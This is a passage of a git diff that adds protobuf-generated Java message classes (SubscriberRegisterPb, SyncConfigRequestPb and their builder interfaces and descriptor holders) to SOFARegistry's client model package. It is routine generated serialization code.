com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder> + getBaseRegisterFieldBuilder() { + if (baseRegisterBuilder_ == null) { + baseRegisterBuilder_ = + new com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder>( + getBaseRegister(), getParentForChildren(), isClean()); + baseRegister_ = null; + } + return baseRegisterBuilder_; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:SubscriberRegisterPb) + } + + // @@protoc_insertion_point(class_scope:SubscriberRegisterPb) + private static final com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public SubscriberRegisterPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new SubscriberRegisterPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.SubscriberRegisterPb + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPbOrBuilder.java new file mode 100644 index 000000000..41af8a0f7 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPbOrBuilder.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface SubscriberRegisterPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:SubscriberRegisterPb) + com.google.protobuf.MessageOrBuilder { + + /** string scope = 1; */ + java.lang.String getScope(); + /** string scope = 1; */ + com.google.protobuf.ByteString getScopeBytes(); + + /** .BaseRegisterPb baseRegister = 2; */ + boolean hasBaseRegister(); + /** .BaseRegisterPb baseRegister = 2; */ + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb getBaseRegister(); + /** .BaseRegisterPb baseRegister = 2; */ + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder + getBaseRegisterOrBuilder(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPbOuterClass.java new file mode 100644 index 000000000..e0cdb9369 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SubscriberRegisterPbOuterClass.java @@ -0,0 +1,72 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class SubscriberRegisterPbOuterClass { + private SubscriberRegisterPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor + internal_static_SubscriberRegisterPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_SubscriberRegisterPb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\032SubscriberRegisterPb.proto\032\024BaseRegist" + + "erPb.proto\"L\n\024SubscriberRegisterPb\022\r\n\005sc" + + "ope\030\001 \001(\t\022%\n\014baseRegister\030\002 \001(\0132\017.BaseRe" + + "gisterPbB7\n/com.alipay.sofa.registry.com" + + "mon.model.client.pbP\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, + new com.google.protobuf.Descriptors.FileDescriptor[] { + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass.getDescriptor(), + }, + assigner); + internal_static_SubscriberRegisterPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_SubscriberRegisterPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_SubscriberRegisterPb_descriptor, + new java.lang.String[] { + "Scope", "BaseRegister", + }); + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass.getDescriptor(); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPb.java new file mode 100644 index 000000000..3868a1ceb --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPb.java @@ -0,0 +1,632 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code SyncConfigRequestPb} */ +public final class SyncConfigRequestPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:SyncConfigRequestPb) + SyncConfigRequestPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use SyncConfigRequestPb.newBuilder() to construct. + private SyncConfigRequestPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private SyncConfigRequestPb() { + dataCenter_ = ""; + zone_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private SyncConfigRequestPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + + dataCenter_ = s; + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + + zone_ = s; + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPbOuterClass + .internal_static_SyncConfigRequestPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPbOuterClass + .internal_static_SyncConfigRequestPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb.class, + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb.Builder.class); + } + + public static final int DATACENTER_FIELD_NUMBER = 1; + private volatile java.lang.Object dataCenter_; + /** string dataCenter = 1; */ + public java.lang.String getDataCenter() { + java.lang.Object ref = dataCenter_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataCenter_ = s; + return s; + } + } + /** string dataCenter = 1; */ + public com.google.protobuf.ByteString getDataCenterBytes() { + java.lang.Object ref = dataCenter_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataCenter_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int ZONE_FIELD_NUMBER = 2; + private volatile java.lang.Object zone_; + /** string zone = 2; */ + public java.lang.String getZone() { + java.lang.Object ref = zone_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + zone_ = s; + return s; + } + } + /** string zone = 2; */ + public com.google.protobuf.ByteString getZoneBytes() { + java.lang.Object ref = zone_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + zone_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (!getDataCenterBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, dataCenter_); + } + if (!getZoneBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, zone_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (!getDataCenterBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, dataCenter_); + } + if (!getZoneBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, zone_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb other = + (com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb) obj; + + boolean result = true; + result = result && getDataCenter().equals(other.getDataCenter()); + result = result && getZone().equals(other.getZone()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + DATACENTER_FIELD_NUMBER; + hash = (53 * hash) + getDataCenter().hashCode(); + hash = (37 * hash) + ZONE_FIELD_NUMBER; + hash = (53 * hash) + getZone().hashCode(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code SyncConfigRequestPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:SyncConfigRequestPb) + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPbOuterClass + .internal_static_SyncConfigRequestPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPbOuterClass + .internal_static_SyncConfigRequestPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb.class, + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + dataCenter_ = ""; + + zone_ = ""; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPbOuterClass + .internal_static_SyncConfigRequestPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb build() { + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb result = + new com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb(this); + result.dataCenter_ = dataCenter_; + result.zone_ = zone_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb + .getDefaultInstance()) return this; + if (!other.getDataCenter().isEmpty()) { + dataCenter_ = other.dataCenter_; + onChanged(); + } + if (!other.getZone().isEmpty()) { + zone_ = other.zone_; + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private java.lang.Object dataCenter_ = ""; + /** string dataCenter = 1; */ + public java.lang.String getDataCenter() { + java.lang.Object ref = dataCenter_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataCenter_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string dataCenter = 1; */ + public com.google.protobuf.ByteString getDataCenterBytes() { + java.lang.Object ref = dataCenter_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataCenter_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string dataCenter = 1; */ + public Builder setDataCenter(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + dataCenter_ = value; + onChanged(); + return this; + } + /** string dataCenter = 1; */ + public Builder clearDataCenter() { + + dataCenter_ = getDefaultInstance().getDataCenter(); + onChanged(); + return this; + } + /** string dataCenter = 1; */ + public Builder setDataCenterBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + dataCenter_ = value; + onChanged(); + return this; + } + + private java.lang.Object zone_ = ""; + /** string zone = 2; */ + public java.lang.String getZone() { + java.lang.Object ref = zone_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + zone_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string zone = 2; */ + public com.google.protobuf.ByteString getZoneBytes() { + java.lang.Object ref = zone_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + zone_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string zone = 2; */ + public Builder setZone(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + zone_ = value; + onChanged(); + return this; + } + /** string zone = 2; */ + public Builder clearZone() { + + zone_ = getDefaultInstance().getZone(); + onChanged(); + return this; + } + /** string zone = 2; */ + public Builder setZoneBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + zone_ = value; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:SyncConfigRequestPb) + } + + // @@protoc_insertion_point(class_scope:SyncConfigRequestPb) + private static final com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public SyncConfigRequestPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new SyncConfigRequestPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPbOrBuilder.java new file mode 100644 index 000000000..6eaeb8c2f --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPbOrBuilder.java @@ -0,0 +1,33 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface SyncConfigRequestPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:SyncConfigRequestPb) + com.google.protobuf.MessageOrBuilder { + + /** string dataCenter = 1; */ + java.lang.String getDataCenter(); + /** string dataCenter = 1; */ + com.google.protobuf.ByteString getDataCenterBytes(); + + /** string zone = 2; */ + java.lang.String getZone(); + /** string zone = 2; */ + com.google.protobuf.ByteString getZoneBytes(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPbOuterClass.java new file mode 100644 index 000000000..3a594515a --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigRequestPbOuterClass.java @@ -0,0 +1,66 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class SyncConfigRequestPbOuterClass { + private SyncConfigRequestPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor + internal_static_SyncConfigRequestPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_SyncConfigRequestPb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\031SyncConfigRequestPb.proto\"7\n\023SyncConfi" + + "gRequestPb\022\022\n\ndataCenter\030\001 \001(\t\022\014\n\004zone\030\002" + + " \001(\tB7\n/com.alipay.sofa.registry.common." + + "model.client.pbP\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, new com.google.protobuf.Descriptors.FileDescriptor[] {}, assigner); + internal_static_SyncConfigRequestPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_SyncConfigRequestPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_SyncConfigRequestPb_descriptor, + new java.lang.String[] { + "DataCenter", "Zone", + }); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePb.java new file mode 100644 index 000000000..dec8e3b51 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePb.java @@ -0,0 +1,785 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file 